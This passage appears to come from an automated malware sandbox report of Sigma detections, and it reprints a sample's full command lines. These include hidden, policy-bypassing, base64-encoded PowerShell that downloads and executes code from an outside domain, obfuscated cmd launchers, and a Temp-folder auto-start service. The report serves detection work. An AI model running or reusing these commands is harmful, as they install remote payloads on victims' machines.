      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANgA3AGYAMAA4ADIAOABkAGUANQA1AGEANwBiADAAYQBlADQAMQA0ADMAZABlAGYANAAxAGIAZQA1ADgAMgA2AGUAMwA1ADcAMgA4AGYAZQA1ADEANgBhADYAOABmAGQANwA3ADcANgBmADQAZgA0ADcANAA2ADgAOQBiAGMANgBhAGIAMgAyADIANwAzAGMANwAzAGIANwAwAGEAMQBkAGIANgBhADEAZAAxAGEANQBhADcAMgAyAGQAYgA1ADcAOAAyADYAYwBkAGIAYQBmADkAYgBiADEAZABhADkAMQA5AGEAYgA2AGIANQAzADkANgA3AGMANABiAGYAMAA0ADQAZgBiADgAMgBiADgAMQBhAGYAZABiAGYAMQA1ADUANgA5AGQANQBlAGMAYwBkAGUAMAAzAGIAYwA4AGMANABhADcAYQA3ADEANAA5ADgAZQBiADEAZAA2AGIAOAAwAGQAMgA2ADAAMAA3ADYANgBhAGEANwA5ADgAMQAxADkAZQA5ADcANAA0AGMAYwBiADkAYQAxADIANAA5ADcANgAxADgAZQA4AGMAMgAxADkAOAA3ADIANgAyADAAMwA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQB
      Sigma detected: Suspicious New Service Creation
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7816, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , ProcessId: 5524, ProcessName: sc.exe
      Sigma detected: Suspicious PowerShell Encoded Command Patterns
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANgA3AGYAMAA4ADIAOABkAGUANQA1AGEANwBiADAAYQBlADQAMQA0ADMAZABlAGYANAAxAGIAZQA1ADgAMgA2AGUAMwA1ADcAMgA4AGYAZQA1ADEANgBhADYAOABmAGQANwA3ADcANgBmADQAZgA0ADcANAA2ADgAOQBiAGMANgBhAGIAMgAyADIANwAzAGMANwAzAGIANwAwAGEAMQBkAGIANgBhADEAZAAxAGEANQBhADcAMgAyAGQAYgA1ADcAOAAyADYAYwBkAGIAYQBmADkAYgBiADEAZABhADkAMQA5AGEAYgA2AGIANQAzADkANgA3AGMANABiAGYAMAA0ADQAZgBiADgAMgBiADgAMQBhAGYAZABiAGYAMQA1ADUANgA5AGQANQBlAGMAYwBkAGUAMAAzAGIAYwA4AGMANABhADcAYQA3ADEANAA5ADgAZQBiADEAZAA2AGIAOAAwAGQAMgA2ADAAMAA3ADYANgBhAGEANwA5ADgAMQAxADkAZQA5ADcANAA0AGMAYwBiADkAYQAxADIANAA5ADcANgAxADgAZQA4AGMAMgAxADkAOAA3ADIANgAyADAAMwA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQB
      Sigma detected: Suspicious PowerShell Parameter Substring
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" , CommandLine: POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" , CommandLine|base64offset|contains: <FD,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "s^t^ar^t /MIn "" POwE^R^shELL -W h^I^D^D^E^n -nO^l^ogo -nO^p -Ep B^yp^a^s^S -ENCO^ded^Com^m^a^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7852, ParentProcessName: cmd.exe, ProcessCommandLine: POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" , ProcessId: 7944, ProcessName: powershell.exe
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" , CommandLine: POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" , CommandLine|base64offset|contains: <FD,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "s^t^ar^t /MIn "" POwE^R^shELL -W h^I^D^D^E^n -nO^l^ogo -nO^p -Ep B^yp^a^s^S -ENCO^ded^Com^m^a^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7852, ParentProcessName: cmd.exe, ProcessCommandLine: POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" , ProcessId: 7944, ProcessName: powershell.exe
      Sigma detected: Dynamic .NET Compilation Via Csc.EXE
      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7944, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.cmdline", ProcessId: 7372, ProcessName: csc.exe
      Sigma detected: Suspicious Execution of Powershell with Base64
      Source: Process startedAuthor: frack113: Data: Command: POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" , CommandLine: POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" , CommandLine|base64offset|contains: <FD,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "s^t^ar^t /MIn "" POwE^R^shELL -W h^I^D^D^E^n -nO^l^ogo -nO^p -Ep B^yp^a^s^S -ENCO^ded^Com^m^a^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7852, ParentProcessName: cmd.exe, ProcessCommandLine: POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" , ProcessId: 7944, ProcessName: powershell.exe
      Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" , CommandLine: POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" , CommandLine|base64offset|contains: <FD,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "s^t^ar^t /MIn "" POwE^R^shELL -W h^I^D^D^E^n -nO^l^ogo -nO^p -Ep B^yp^a^s^S -ENCO^ded^Com^m^a^N^d 